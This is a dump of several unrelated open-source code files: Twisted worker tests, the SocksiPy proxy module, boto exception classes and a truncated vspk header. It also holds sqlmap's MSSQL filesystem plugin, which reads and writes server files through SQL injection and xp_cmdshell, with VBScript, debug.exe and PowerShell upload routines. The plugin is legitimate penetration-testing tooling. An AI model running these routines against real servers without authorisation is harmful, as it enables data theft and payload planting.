self.assertEqual(localWorker._outLog.callNumber, 1)
self.assertEqual(localWorker._errLog.callNumber, 1)
def test_processEnded(self):
"""
L{LocalWorker.processEnded} calls C{connectionLost} on itself and on
the L{AMP} protocol.
"""
class FakeStream(object):
callNumber = 0
def close(self):
self.callNumber += 1
transport = FakeTransport()
protocol = FakeAMProtocol()
localWorker = LocalWorker(protocol, '.', 'test.log')
localWorker.makeConnection(transport)
localWorker._outLog = FakeStream()
localWorker.processEnded(Failure(CONNECTION_DONE))
self.assertEqual(localWorker._outLog.callNumber, 1)
self.assertIdentical(None, protocol.transport)
return self.assertFailure(localWorker.endDeferred, ConnectionDone)
def test_addresses(self):
"""
L{LocalWorkerTransport.getPeer} and L{LocalWorkerTransport.getHost}
return L{IAddress} objects.
"""
localTransport = LocalWorkerTransport(None)
self.assertTrue(verifyObject(IAddress, localTransport.getPeer()))
self.assertTrue(verifyObject(IAddress, localTransport.getHost()))
def test_transport(self):
"""
L{LocalWorkerTransport} implements L{ITransport} to be able to be used
by L{AMP}.
"""
localTransport = LocalWorkerTransport(None)
self.assertTrue(verifyObject(ITransport, localTransport))
def test_startError(self):
"""
L{LocalWorker} swallows the exceptions returned by the L{AMP} protocol
start method, as it generates unnecessary errors.
"""
def failCallRemote(command, directory):
return fail(RuntimeError("oops"))
transport = FakeTransport()
protocol = FakeAMProtocol()
protocol.callRemote = failCallRemote
localWorker = LocalWorker(protocol, '.', 'test.log')
localWorker.makeConnection(transport)
self.assertEqual([], self.flushLoggedErrors(RuntimeError))
| lgpl-3.0 |
konrado0/vosqa | forum_modules/oauthauth/lib/oauth2/httplib2/socks.py | 29 | 16293 | """SocksiPy - Python SOCKS module.
Version 1.00
Copyright 2006 Dan-Haim. All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of Dan Haim nor the names of his contributors may be used
to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA
OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
This module provides a standard socket-like interface for Python
for tunneling connections through SOCKS proxies.
"""
"""
Minor modifications made by Christopher Gilbert (http://motomastyle.com/)
for use in PyLoris (http://pyloris.sourceforge.net/)
Minor modifications made by Mario Vilas (http://breakingcode.wordpress.com/)
mainly to merge bug fixes found in Sourceforge
"""
import socket
import struct
import sys
if getattr(socket, 'socket', None) is None:
raise ImportError('socket.socket missing, proxy support unusable')
PROXY_TYPE_SOCKS4 = 1
PROXY_TYPE_SOCKS5 = 2
PROXY_TYPE_HTTP = 3
_defaultproxy = None
_orgsocket = socket.socket
class ProxyError(Exception): pass
class GeneralProxyError(ProxyError): pass
class Socks5AuthError(ProxyError): pass
class Socks5Error(ProxyError): pass
class Socks4Error(ProxyError): pass
class HTTPError(ProxyError): pass
_generalerrors = ("success",
"invalid data",
"not connected",
"not available",
"bad proxy type",
"bad input")
_socks5errors = ("succeeded",
"general SOCKS server failure",
"connection not allowed by ruleset",
"Network unreachable",
"Host unreachable",
"Connection refused",
"TTL expired",
"Command not supported",
"Address type not supported",
"Unknown error")
_socks5autherrors = ("succeeded",
"authentication is required",
"all offered authentication methods were rejected",
"unknown username or invalid password",
"unknown error")
_socks4errors = ("request granted",
"request rejected or failed",
"request rejected because SOCKS server cannot connect to identd on the client",
"request rejected because the client program and identd report different user-ids",
"unknown error")
def setdefaultproxy(proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
"""setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
Sets a default proxy which all further socksocket objects will use,
unless explicitly changed.
"""
global _defaultproxy
_defaultproxy = (proxytype, addr, port, rdns, username, password)
def wrapmodule(module):
"""wrapmodule(module)
Attempts to replace a module's socket library with a SOCKS socket. Must set
a default proxy using setdefaultproxy(...) first.
This will only work on modules that import socket directly into the namespace;
most of the Python Standard Library falls into this category.
"""
if _defaultproxy != None:
module.socket.socket = socksocket
else:
raise GeneralProxyError((4, "no proxy specified"))
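# Illustrative usage sketch (added; not part of the original module). Host and
# port values below are placeholder assumptions:
#
#   import ftplib
#   setdefaultproxy(PROXY_TYPE_SOCKS5, "127.0.0.1", 1080)
#   wrapmodule(ftplib)        # ftplib now opens its sockets through the proxy
#
#   s = socksocket()          # or proxy a single connection explicitly
#   s.connect(("example.com", 80))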
class socksocket(socket.socket):
"""socksocket([family[, type[, proto]]]) -> socket object
Open a SOCKS enabled socket. The parameters are the same as
those of the standard socket init. In order for SOCKS to work,
you must specify family=AF_INET, type=SOCK_STREAM and proto=0.
"""
def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):
_orgsocket.__init__(self, family, type, proto, _sock)
if _defaultproxy != None:
self.__proxy = _defaultproxy
else:
self.__proxy = (None, None, None, None, None, None)
self.__proxysockname = None
self.__proxypeername = None
def __recvall(self, count):
"""__recvall(count) -> data
Receive EXACTLY the number of bytes requested from the socket.
Blocks until the required number of bytes have been received.
"""
data = self.recv(count)
while len(data) < count:
d = self.recv(count-len(data))
if not d: raise GeneralProxyError((0, "connection closed unexpectedly"))
data = data + d
return data
def setproxy(self, proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
"""setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
Sets the proxy to be used.
proxytype - The type of the proxy to be used. Three types
are supported: PROXY_TYPE_SOCKS4 (including socks4a),
PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP
addr - The address of the server (IP or DNS).
port - The port of the server. Defaults to 1080 for SOCKS
servers and 8080 for HTTP proxy servers.
rdns - Should DNS queries be performed on the remote side
(rather than the local side). The default is True.
Note: This has no effect with SOCKS4 servers.
username - Username to authenticate with to the server.
The default is no authentication.
password - Password to authenticate with to the server.
Only relevant when username is also provided.
"""
self.__proxy = (proxytype, addr, port, rdns, username, password)
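    # Illustrative sketch (added; not part of the original module) of per-socket
    # configuration with the parameters documented above; addresses are
    # placeholder assumptions:
    #
    #   s = socksocket()
    #   s.setproxy(PROXY_TYPE_SOCKS5, "proxy.example.com", 1080,
    #              rdns=True, username="user", password="secret")
    #   s.connect(("irc.example.net", 6667))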
def __negotiatesocks5(self, destaddr, destport):
"""__negotiatesocks5(self,destaddr,destport)
Negotiates a connection through a SOCKS5 server.
"""
# First we'll send the authentication packages we support.
if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):
# The username/password details were supplied to the
# setproxy method so we support the USERNAME/PASSWORD
# authentication (in addition to the standard none).
self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02))
else:
# No username/password were entered, therefore we
# only support connections with no authentication.
self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00))
# We'll receive the server's response to determine which
# method was selected
chosenauth = self.__recvall(2)
if chosenauth[0:1] != chr(0x05).encode():
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
# Check the chosen authentication method
if chosenauth[1:2] == chr(0x00).encode():
# No authentication is required
pass
elif chosenauth[1:2] == chr(0x02).encode():
# Okay, we need to perform a basic username/password
# authentication.
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5])
authstat = self.__recvall(2)
if authstat[0:1] != chr(0x01).encode():
# Bad response
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
if authstat[1:2] != chr(0x00).encode():
# Authentication failed
self.close()
raise Socks5AuthError((3, _socks5autherrors[3]))
# Authentication succeeded
else:
# Reaching here is always bad
self.close()
            if ord(chosenauth[1:2]) == 0xFF:
raise Socks5AuthError((2, _socks5autherrors[2]))
else:
raise GeneralProxyError((1, _generalerrors[1]))
# Now we can request the actual connection
req = struct.pack('BBB', 0x05, 0x01, 0x00)
# If the given destination address is an IP address, we'll
# use the IPv4 address request even if remote resolving was specified.
try:
ipaddr = socket.inet_aton(destaddr)
req = req + chr(0x01).encode() + ipaddr
except socket.error:
# Well it's not an IP number, so it's probably a DNS name.
if self.__proxy[3]:
# Resolve remotely
ipaddr = None
req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + destaddr
else:
# Resolve locally
ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
req = req + chr(0x01).encode() + ipaddr
req = req + struct.pack(">H", destport)
self.sendall(req)
# Get the response
resp = self.__recvall(4)
if resp[0:1] != chr(0x05).encode():
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
elif resp[1:2] != chr(0x00).encode():
# Connection failed
self.close()
if ord(resp[1:2])<=8:
raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])]))
else:
raise Socks5Error((9, _socks5errors[9]))
# Get the bound address/port
elif resp[3:4] == chr(0x01).encode():
boundaddr = self.__recvall(4)
elif resp[3:4] == chr(0x03).encode():
resp = resp + self.recv(1)
boundaddr = self.__recvall(ord(resp[4:5]))
else:
self.close()
raise GeneralProxyError((1,_generalerrors[1]))
boundport = struct.unpack(">H", self.__recvall(2))[0]
self.__proxysockname = (boundaddr, boundport)
if ipaddr != None:
self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
else:
self.__proxypeername = (destaddr, destport)
def getproxysockname(self):
"""getsockname() -> address info
Returns the bound IP address and port number at the proxy.
"""
return self.__proxysockname
def getproxypeername(self):
"""getproxypeername() -> address info
Returns the IP and port number of the proxy.
"""
return _orgsocket.getpeername(self)
def getpeername(self):
"""getpeername() -> address info
Returns the IP address and port number of the destination
machine (note: getproxypeername returns the proxy)
"""
return self.__proxypeername
def __negotiatesocks4(self,destaddr,destport):
"""__negotiatesocks4(self,destaddr,destport)
Negotiates a connection through a SOCKS4 server.
"""
# Check if the destination address provided is an IP address
rmtrslv = False
try:
ipaddr = socket.inet_aton(destaddr)
except socket.error:
# It's a DNS name. Check where it should be resolved.
if self.__proxy[3]:
ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01)
rmtrslv = True
else:
ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
# Construct the request packet
req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr
# The username parameter is considered userid for SOCKS4
if self.__proxy[4] != None:
req = req + self.__proxy[4]
req = req + chr(0x00).encode()
# DNS name if remote resolving is required
# NOTE: This is actually an extension to the SOCKS4 protocol
# called SOCKS4A and may not be supported in all cases.
if rmtrslv:
req = req + destaddr + chr(0x00).encode()
self.sendall(req)
# Get the response from the server
resp = self.__recvall(8)
if resp[0:1] != chr(0x00).encode():
# Bad data
self.close()
raise GeneralProxyError((1,_generalerrors[1]))
if resp[1:2] != chr(0x5A).encode():
# Server returned an error
self.close()
if ord(resp[1:2]) in (91, 92, 93):
self.close()
raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90]))
else:
raise Socks4Error((94, _socks4errors[4]))
# Get the bound address/port
self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0])
        if not rmtrslv:
self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
else:
self.__proxypeername = (destaddr, destport)
def __negotiatehttp(self, destaddr, destport):
"""__negotiatehttp(self,destaddr,destport)
Negotiates a connection through an HTTP server.
"""
# If we need to resolve locally, we do this now
if not self.__proxy[3]:
addr = socket.gethostbyname(destaddr)
else:
addr = destaddr
self.sendall(("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n").encode())
# We read the response until we get the string "\r\n\r\n"
resp = self.recv(1)
while resp.find("\r\n\r\n".encode()) == -1:
resp = resp + self.recv(1)
# We just need the first line to check if the connection
# was successful
statusline = resp.splitlines()[0].split(" ".encode(), 2)
if statusline[0] not in ("HTTP/1.0".encode(), "HTTP/1.1".encode()):
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
try:
statuscode = int(statusline[1])
except ValueError:
self.close()
raise GeneralProxyError((1, _generalerrors[1]))
if statuscode != 200:
self.close()
raise HTTPError((statuscode, statusline[2]))
self.__proxysockname = ("0.0.0.0", 0)
self.__proxypeername = (addr, destport)
def connect(self, destpair):
"""connect(self, despair)
Connects to the specified destination through a proxy.
destpar - A tuple of the IP/DNS address and the port number.
(identical to socket's connect).
To select the proxy server use setproxy().
"""
# Do a minimal input check first
if (not type(destpair) in (list,tuple)) or (len(destpair) < 2) or (type(destpair[0]) != type('')) or (type(destpair[1]) != int):
raise GeneralProxyError((5, _generalerrors[5]))
if self.__proxy[0] == PROXY_TYPE_SOCKS5:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 1080
_orgsocket.connect(self, (self.__proxy[1], portnum))
self.__negotiatesocks5(destpair[0], destpair[1])
elif self.__proxy[0] == PROXY_TYPE_SOCKS4:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 1080
_orgsocket.connect(self,(self.__proxy[1], portnum))
self.__negotiatesocks4(destpair[0], destpair[1])
elif self.__proxy[0] == PROXY_TYPE_HTTP:
if self.__proxy[2] != None:
portnum = self.__proxy[2]
else:
portnum = 8080
_orgsocket.connect(self,(self.__proxy[1], portnum))
self.__negotiatehttp(destpair[0], destpair[1])
elif self.__proxy[0] == None:
_orgsocket.connect(self, (destpair[0], destpair[1]))
else:
raise GeneralProxyError((4, _generalerrors[4]))
| gpl-3.0 |
zachmullen/boto | boto/configservice/exceptions.py | 135 | 2528 | # Copyright (c) 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.exception import BotoServerError
class InvalidLimitException(BotoServerError):
pass
class NoSuchBucketException(BotoServerError):
pass
class InvalidSNSTopicARNException(BotoServerError):
pass
class ResourceNotDiscoveredException(BotoServerError):
pass
class MaxNumberOfDeliveryChannelsExceededException(BotoServerError):
pass
class LastDeliveryChannelDeleteFailedException(BotoServerError):
pass
class InsufficientDeliveryPolicyException(BotoServerError):
pass
class InvalidRoleException(BotoServerError):
pass
class InvalidTimeRangeException(BotoServerError):
pass
class NoSuchDeliveryChannelException(BotoServerError):
pass
class NoSuchConfigurationRecorderException(BotoServerError):
pass
class InvalidS3KeyPrefixException(BotoServerError):
pass
class InvalidDeliveryChannelNameException(BotoServerError):
pass
class NoRunningConfigurationRecorderException(BotoServerError):
pass
class ValidationException(BotoServerError):
pass
class NoAvailableConfigurationRecorderException(BotoServerError):
pass
class InvalidNextTokenException(BotoServerError):
pass
class InvalidConfigurationRecorderNameException(BotoServerError):
pass
class NoAvailableDeliveryChannelException(BotoServerError):
pass
class MaxNumberOfConfigurationRecordersExceededException(BotoServerError):
pass
| mit |
sanghinitin/golismero | tools/sqlmap/plugins/dbms/mssqlserver/filesystem.py | 8 | 14284 | #!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import ntpath
import os
from lib.core.common import getLimitRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def _dataToScr(self, fileContent, chunkName):
fileLines = []
fileSize = len(fileContent)
lineAddr = 0x100
lineLen = 20
fileLines.append("n %s" % chunkName)
fileLines.append("rcx")
fileLines.append("%x" % fileSize)
fileLines.append("f 0100 %x 00" % fileSize)
for fileLine in xrange(0, len(fileContent), lineLen):
scrString = ""
for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = hexencode(lineChar)
if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar)
else:
scrString += " %s" % strLineChar
lineAddr += len(lineChar)
fileLines.append(scrString)
fileLines.append("w")
fileLines.append("q")
return fileLines
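    # Illustrative note (added): for the 3-byte payload "ABC" and chunk name
    # "abc", the debug.exe script built above would be, line by line:
    #
    #   n abc
    #   rcx
    #   3
    #   f 0100 3 00
    #   e 100 41 42 43
    #   w
    #   q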
def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
return chunkName
def stackedReadFile(self, rFile):
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
result = []
txtTbl = self.fileTblName
hexTbl = "%shex" % self.fileTblName
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
logger.debug("loading the content of file '%s' into support table" % rFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
# Reference: http://support.microsoft.com/kb/104829
binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
DECLARE @length INT
DECLARE @chunk INT
SET @charset = '0123456789ABCDEF'
SET @counter = 1
SET @hexstr = ''
SET @length = (SELECT DATALENGTH(%s) FROM %s)
SET @chunk = 1024
WHILE (@counter <= @length)
BEGIN
DECLARE @tempint INT
DECLARE @firstint INT
DECLARE @secondint INT
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
SET @firstint = floor(@tempint/16)
SET @secondint = @tempint - (@firstint * 16)
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
SET @counter = @counter + 1
IF @counter %% @chunk = 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
SET @hexstr = ''
END
END
IF @counter %% (@chunk) != 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
inject.goStacked(binToHexQuery)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
if not result:
result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile
raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count)
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl)
return result
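    # Illustrative sketch (added; not part of sqlmap): each returned chunk is a
    # hex string covering part of the file, so a caller could reassemble the raw
    # bytes roughly like this (Python 2 style, matching this module):
    #
    #   hexdump = "".join(chunk for chunk in result if chunk)
    #   raw_bytes = hexdump.decode("hex")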
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s', please wait.." % dFile
logger.info(infoMsg)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
encodedFileContent = hexencode(wFileContent)
# TODO: need to be fixed
psString = "$s = gc '%s';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %%{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('%s',$b)" % (randFilePath, dFile)
psString = psString.encode('utf-16le')
psString = psString.encode("base64")[:-1].replace("\n", "")
logger.debug("uploading the file hex-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("converting the file utilizing PowerShell EncodedCommand")
commands = ("cd %s" % tmpPath,
"powershell -EncodedCommand %s" % psString,
"del /F /Q %s" % randFilePath)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg)
dFileName = ntpath.basename(dFile)
sFile = "%s\%s" % (tmpPath, dFileName)
wFileSize = os.path.getsize(wFile)
debugSize = 0xFF00
if wFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
debugMsg += "it chunk by chunk and recreate the original file "
debugMsg += "on the server, please wait.."
logger.debug(debugMsg)
for i in xrange(0, wFileSize, debugSize):
wFileChunk = wFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(wFileChunk, tmpPath)
if i == 0:
debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, dFileName)
else:
debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg)
commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
vbs = """Dim inputFilePath, outputFilePath
inputFilePath = "%s"
outputFilePath = "%s"
Set fs = CreateObject("Scripting.FileSystemObject")
Set file = fs.GetFile(inputFilePath)
If file.Size Then
Wscript.Echo "Loading from: " & inputFilePath
Wscript.Echo
Set fd = fs.OpenTextFile(inputFilePath, 1)
data = fd.ReadAll
fd.Close
data = Replace(data, " ", "")
data = Replace(data, vbCr, "")
data = Replace(data, vbLf, "")
Wscript.Echo "Fixed Input: "
Wscript.Echo data
Wscript.Echo
decodedData = base64_decode(data)
Wscript.Echo "Output: "
Wscript.Echo decodedData
Wscript.Echo
Wscript.Echo "Writing output in: " & outputFilePath
Wscript.Echo
Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True)
ofs.Write decodedData
ofs.close
Else
Wscript.Echo "The file is empty."
End If
Function base64_decode(byVal strIn)
Dim w1, w2, w3, w4, n, strOut
For n = 1 To Len(strIn) Step 4
w1 = mimedecode(Mid(strIn, n, 1))
w2 = mimedecode(Mid(strIn, n + 1, 1))
w3 = mimedecode(Mid(strIn, n + 2, 1))
w4 = mimedecode(Mid(strIn, n + 3, 1))
If Not w2 Then _
strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))
If Not w3 Then _
strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))
If Not w4 Then _
strOut = strOut + Chr(((w3 * 64 + w4) And 255))
Next
base64_decode = strOut
End Function
Function mimedecode(byVal strIn)
Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If Len(strIn) = 0 Then
mimedecode = -1 : Exit Function
Else
mimedecode = InStr(Base64Chars, strIn) - 1
End If
End Function""" % (randFilePath, dFile)
vbs = vbs.replace(" ", "")
encodedFileContent = wFileContent.encode("base64")[:-1]
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd %s" % tmpPath, "cscript //nologo %s" % randVbs,
"del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
# file system
self.initEnv()
self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath)
dFile = posixToNtSlashes(dFile)
with open(wFile, "rb") as f:
wFileContent = f.read()
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "another technique? [Y/n] "
choice = readInput(message, default="Y")
if not choice or choice.lower() == "y":
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
#self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
return written
| gpl-2.0 |
nuagenetworks/vspk-python | vspk/v6/fetchers/nuipfilterprofiles_fetcher.py | 2 | 2156 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
